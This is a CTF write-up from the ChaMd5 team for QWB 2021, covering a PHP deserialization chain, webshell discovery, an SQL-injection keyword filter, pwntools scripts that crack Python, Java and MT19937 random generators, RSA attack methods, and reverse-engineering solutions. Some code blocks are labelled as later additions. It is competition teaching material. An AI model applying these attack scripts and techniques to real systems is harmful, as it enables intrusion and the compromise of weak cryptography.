QWB WriteUp

2021-02-14 ChaMd5 Security Team
Web

upload 

A web application built on a particular version of the ThinkPHP (tp) framework.

This version has no well-known, obvious vulnerabilities.

Tested each field of the registration form.


ThinkPHP's framework-level injection vectors are filtered as well?? So there should be no injection vulnerability here.

The cookie carries serialized data, i.e. a deserialization point.

Modified the serialized data to point at a different image path in an attempt to read files that way; it failed.

http://119.3.203.228:32655/upload/

Directory listing is enabled.

Rescanning found the backup file www.tar.gz. Audited the source code and looked directly for a deserialization gadget chain.

The destructor of register calls profile's __call, which in turn calls profile's upload_img, copying an image that has already been uploaded.


高明的黑客 (The Brilliant Hacker)

Extract every input variable and forcibly assign it a value.

Include the file; if there is output, execution succeeded, which means that is the working shell.

php test.php

Then, found 'src/xk0SzyKwfzw.php' in orz.log


隨便注 (Inject As You Like)

return preg_match("/select|update|delete|drop|insert|where|\./i", $inject);

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1


Misc

鯤or鰻orGame 

Opened the game page, inspected the page elements and found a .gb (Game Boy ROM) file.


Debugged it with the BGB debugger.


Used the cheat searcher.


Found the right memory location and froze it at FF.


Ran it under the debugger.

Got the flag:

flag{PS03R49UE576R421RE8}

Crypto

copperstudy 

Solution approach

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 / pwntools solve script for the three random-number challenges.
from pwn import *
from pwnlib.util.iters import bruteforce
from parse import *
import string
from hashlib import sha256
import time
import random
import os
context.log_level="debug"

def s1(p,t):
    # Challenge 1: the server seeds Python's random with the current time.
    # Try timestamps around ours and successive outputs until one is accepted.
    p.recvuntil('[+]Generating challenge 1\n')
    for i in range(200):
        t=t+random.randint(-2,2)
        random.seed(t)
        f=0
        for _ in range(i+1):
            f=random.randint(0,2**64)
        p.sendline(str(f))
        fff=p.recvline()
        print(i+1,fff)
        if '[+]failed' not in fff:
            return
def s2(p):
    # Challenge 2: two consecutive java.util.Random outputs are given; aa.jar
    # (the Java program below) recovers the 48-bit state and prints the next one.
    p.recvuntil('[+]Generating challenge 2\n')
    for _ in range(200):
        p.recvuntil('[-]')
        n1=int(p.recvline()[:-1])
        p.recvuntil('[-]')
        n2=int(p.recvline()[:-1])
        print(n1,n2)
        r=os.popen('java -jar aa.jar {i} {j}'.format(i=n1,j=n2)).read()
        print(r)
        p.sendline(r.replace('\n',''))
        fff=p.recvline()
        if '[+]failed' not in fff:
            return
def s3(p):
    # Challenge 3: MT19937. Each wrong guess reveals the real 32-bit output;
    # feed 624 of them to RandCrack, then predict the next one.
    from randcrack import RandCrack
    rc = RandCrack()
    p.recvuntil('[+]Generating challenge 3\n')
    p.recvuntil('[-]')
    for _ in range(624):
        p.sendline('1')
        print(p.recvuntil('[+]failed:',timeout=1))
        n1=int(p.recvline(timeout=0.5)[:-1])
        print(_,n1)
        rc.submit(n1)
    p.sendline(str(rc.predict_randrange(0, 4294967295)))
    fff=p.recvline()
    if '[+]failed' not in fff:
        return

if len(sys.argv)==1:
    conn=process(pwn_file)   # pwn_file: path to a local copy of the challenge (not given here)
    pid=conn.pid
else:
    conn=remote("119.3.245.36",23456)
sss=''
for i in range(0xff):
    sss+=chr(i)
def brute_force(c,s):
    # Proof of work: find 3 bytes x such that sha256(c+x) == s
    return bruteforce(lambda x:sha256(c+x).hexdigest()==s,sss,length=3)
conn.recvline()
#data=conn.recvline(keepends=False)
data=conn.recvline()
s=parse("[+]hashlib.sha256(skr).hexdigest()={}\n",data)[0]
data=conn.recvline()
c=parse("[+]skr[0:5].encode('hex')={}\n",data)[0].decode('hex')
print(c,s)
# s=data[7:11]
conn.sendline((c+brute_force(c,s)).encode('hex'))
conn.recvuntil('[+]teamtoken:')
conn.sendline('cb5c28f9d64b8be2e3d80195')
ggg=int(time.time())
print(ggg)
s1(conn,ggg)
s2(conn)
s3(conn)
conn.interactive()


package com.company;
import java.util.Random;

public class Main {
    // implemented after https://docs.oracle.com/javase/7/docs/api/java/util/Random.html
    // One LCG step of java.util.Random; returns the top 32 bits of the new 48-bit state.
    public static int next(long seed) {
        int bits = 32;
        long seed2 = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1);
        return (int) (seed2 >>> (48 - bits));
    }

    public static void main(String[] args) {
        // args[0], args[1]: two consecutive nextInt() outputs from the server
        long i1 = Long.parseLong(args[0]);
        long i2 = Long.parseLong(args[1]);
        long seed = 0;
        // The first output is the high 32 bits of the state; brute-force the low 16 bits.
        for (int i = 0; i < 65536; i++) {
            seed = i1 * 65536 + i;
            if (next(seed) == i2) {
                break;
            }
        }
        // new Random(x) XORs x with the multiplier, so undo that to install the recovered state.
        Random random = new Random((seed ^ 0x5DEECE66DL) & ((1L << 48) - 1));
        int o1 = random.nextInt();   // equals i2
        int o2 = random.nextInt();   // the prediction sent back to the server
        System.out.println(o2);
    }
}
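The same state recovery as a pure-Python module, added here as an example (it is not part of the original writeup): it re-implements enough of java.util.Random to generate test vectors offline, so the aa.jar shell-out in s2() can be replaced and the recovery can be checked without a JVM. Unlike the Java version it returns None when no low-16-bit candidate matches the second output. Seeds used below are constructed.

```python
MULT = 0x5DEECE66D      # java.util.Random LCG multiplier
ADD = 0xB               # LCG increment
MASK = (1 << 48) - 1    # the state is 48 bits wide

def to_int32(v):
    """Interpret the low 32 bits of v as a signed Java int."""
    v &= 0xFFFFFFFF
    return v - (1 << 32) if v & 0x80000000 else v

def step(state):
    """One LCG step: the seed update inside Random.next()."""
    return (state * MULT + ADD) & MASK

class JavaRandom:
    """Minimal java.util.Random: setSeed() scrambling plus next(bits)/nextInt()."""
    def __init__(self, seed):
        self.state = (seed ^ MULT) & MASK
    def next(self, bits):
        self.state = step(self.state)
        return to_int32(self.state >> (48 - bits))
    def next_int(self):
        return self.next(32)

def outputs(seed, n):
    """First n nextInt() values for a seed (handy for comparing against a JVM)."""
    rng = JavaRandom(seed)
    return [rng.next_int() for _ in range(n)]

def recover_state(o1, o2):
    """nextInt() leaks the top 32 bits of the state; brute-force the low 16 bits
    and use the second output as the check. Returns the state after o2, or None."""
    hi = (o1 & 0xFFFFFFFF) << 16
    for lo in range(1 << 16):
        candidate = step(hi | lo)
        if to_int32(candidate >> 16) == o2:
            return candidate
    return None

def predict_next(o1, o2):
    """Third nextInt() output given the first two, or None if no state fits."""
    st = recover_state(o1, o2)
    return None if st is None else to_int32(step(st) >> 16)

def self_check(seed):
    """Constructed round trip: generate three outputs, predict the third from the first two."""
    a, b, c = outputs(seed, 3)
    return predict_next(a, b) == c
```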

randomstudy 

Solution approach

Layer 1: standard Coppersmith

Layer 2: Factoring with High Bits Known

Layer 3: partial private key exposure attack, see https://code.felinae98.cn/ctf/crypto/rsa%E5%A4%A7%E7%A4%BC%E5%8C%85%EF%BC%88%E4%BA%8C%EF%BC%89coppersmith-%E7%9B%B8%E5%85%B3/

Layer 4: broadcast attack

Layer 5: Related Message Attack

Layer 6: Boneh and Durfee attack
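A worked version of the broadcast attack named in Layer 4 (Håstad, e = 3, same message to three recipients), added here as an example rather than the writeup's own solution; the moduli are constructed from well-known primes and are not the challenge's parameters.

```python
from functools import reduce

E = 3
# constructed pairwise-coprime moduli built from well-known primes (not the challenge's values)
N1 = (2**61 - 1) * (2**31 - 1)            # two Mersenne primes
N2 = (2**64 - 59) * 1000000007            # largest prime below 2**64 times 1e9+7
N3 = (2**89 - 1) * (2**13 - 1)            # two Mersenne primes
MODULI = [N1, N2, N3]

def crt(residues, moduli):
    """Chinese remainder theorem: the unique x mod prod(moduli) with x = r_i mod n_i."""
    N = reduce(lambda a, b: a * b, moduli, 1)
    x = 0
    for r, n in zip(residues, moduli):
        Ni = N // n
        x += r * Ni * pow(Ni, -1, n)      # modular inverse; needs Python 3.8+
    return x % N, N

def iroot(x, k):
    """Exact integer k-th root: the largest r with r**k <= x (binary search)."""
    lo, hi = 0, 1 << (x.bit_length() // k + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid**k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo

def encrypt_broadcast(m, moduli, e=E):
    """The same message encrypted to every recipient with the same small e."""
    return [pow(m, e, n) for n in moduli]

def hastad(ciphertexts, moduli, e=E):
    """Recover m from c_i = m**e mod n_i. Since m < every n_i, m**e < prod(n_i),
    so CRT gives m**e over the integers and an exact root finishes the job.
    Returns None when the combined value is not a perfect e-th power."""
    me, _ = crt(ciphertexts, moduli)
    m = iroot(me, e)
    return m if m**e == me else None

# constructed sample message: 11 bytes, so m < N1 and m**3 < N1*N2*N3
SAMPLE_M = int.from_bytes(b"qwb-hastad!", "big")
```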

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 / pwntools submission script: the six answers (one per layer above)
# were computed offline and are sent in order after the proof of work.

from pwn import *
from pwnlib.util.iters import bruteforce
from parse import *
from hashlib import sha256
# context.log_level="debug"

ggg=[]   # precomputed answers for challenges 1..6
ggg.append('072ee8ffcc3dcf5fdd473fdd592358a9e736b68d3d800976b3030e0a04cc4a33ef05b16e0baea27adfe032cb34f08fe96344a27dc755ee7ccae9d52cdea801db')
ggg.append('474fd237a45154d5c83a41c1ffb7304352ddfd59ee29abeceb76c3d7ee45d80c9ccd33d5fa8bed2c70ebfc8d83e032715dc333daf0d87782f680bc86f3502c7f')
ggg.append('3116bc82757de96d6d85af8b63b297e37d630babf2841ab9fec235e3915268a6d7aca5d9302058f1f00873f17c39894454c8c46e318ed45a13c91b0c2b798546')
ggg.append('159f938209f793ca728fbfe0f4adc0fbbf7ed325c6dd8e21338e9f917aa3549dfdda0f5b0531a9197b0d4b656c649da2dbc8dc6e89cb71c0e2555ffbf04fd2ef')
ggg.append('2a3373b8117231ca9254fd828256ca891ce497370c1e8c48e9362accdb1ffed4e1037096bc2cd58ac33f4c0c47270e3b9f4469025647f1ed92e90b38d02579ae')
ggg.append('6b3bb0cdc72a7f2ce89902e19db0fb2c0514c76874b2ca4113b86e6dc128d44cc859283db4ca8b0b5d9ee35032aec8cc8bb96e8c11547915fc9ef05aa2d72b28')


conn=remote("119.3.245.36",12345)
sss=''
for i in range(0xff):
    sss+=chr(i)
def brute_force(c,s):
    # Proof of work: find 3 bytes x such that sha256(c+x) == s
    return bruteforce(lambda x:sha256(c+x).hexdigest()==s,sss,length=3)
conn.recvline()
#data=conn.recvline(keepends=False)
data=conn.recvline()
s=parse("[+]hashlib.sha256(skr).hexdigest()={}\n",data)[0]
data=conn.recvline()
c=parse("[+]skr[0:5].encode('hex')={}\n",data)[0].decode('hex')
print(c,s)
# s=data[7:11]
conn.sendline((c+brute_force(c,s)).encode('hex'))
conn.recvuntil('[+]teamtoken:')
conn.sendline('cb5c28f9d64b8be2e3d80195')
for i in range(len(ggg)):
    conn.recvuntil('[+]Generating challenge '+str(i+1))
    conn.sendline(ggg[i])
conn.interactive()

Reverse

Solution approach

The check has two parts.

Part 1 checks 10 bytes; the check passes when the code data decodes correctly. Enumerating a single byte at a time is enough. The code is as follows:


0x10 0x13242298

part1:1324229810

Part 2 checks 16 bytes using 3DES in EDE mode. Solve it dynamically: patch the code slightly so it runs the inverse operation (decrypt instead of encrypt).

Check data: 507CA9E68709CEFA20D50DCF90BB976C9090F6B07BA6A4E8

Key: AFSAFCEDYCXCXACNDFKDCQXC

Recovered input: 0dcc509a6f75849b


Final flag: 13242298100dcc509a6f75849b

webassembly 

Solution approach

Convert the wasm to C and compile it.

The main check code is as follows:


XTEA encryption

The input is 38 bytes. The first 32 bytes are XTEA-encrypted, then all 38 bytes are compared with hard-coded data.

38-byte check data (hex): 959668e7b75517c9ad031ecf6fc5614b0290fd2d22ed0a93307ec9ec8c96b1e065363862627d

Just XTEA-decrypt the first 32 bytes.

import xtea   # python-xtea package; this script is Python 2 like the others

t = '959668e7b75517c9ad031ecf6fc5614b0290fd2d22ed0a93307ec9ec8c96b1e0'
flag = ''
for i in range(4):
    # XTEA with an all-zero 16-byte key, one 8-byte block per iteration
    ci = xtea.new('\x00'*16)
    # each 4-byte half is stored little-endian in the check data, so reverse it before decrypting
    m = ci.decrypt(t[16*i:16*(i+1)-8].decode('hex')[::-1]+t[16*(i+1)-8:16*(i+1)].decode('hex')[::-1])
    flag += m[:4][::-1]+m[4:][::-1]
# the last 6 bytes are not encrypted
flag += '65363862627d'.decode('hex')
print flag

Final flag: flag{1c15908d00762edf4a0dd7ebbabe68bb}

設備固件 (Device Firmware)

Solution approach

The username is checked directly against a hard-coded value: 2cbca

The password check is done through a VM.

The VM instructions are as follows:


Reverse it directly:

Password obtained: 134bb097e43b292f4431b6cd8db194db

Final flag: flag{2cbca134bb097e43b292f4431b6cd8db194db}

Hey there, young man, want to go out with us?

The two-hundred-jin (100 kg) kind, that is.

Recruitment notice

The ChaMd5 CTF team is recruiting on an ongoing basis,

especially experts in crypto, reverse, pwn and smart contracts.

Contact admin@chamd5.org
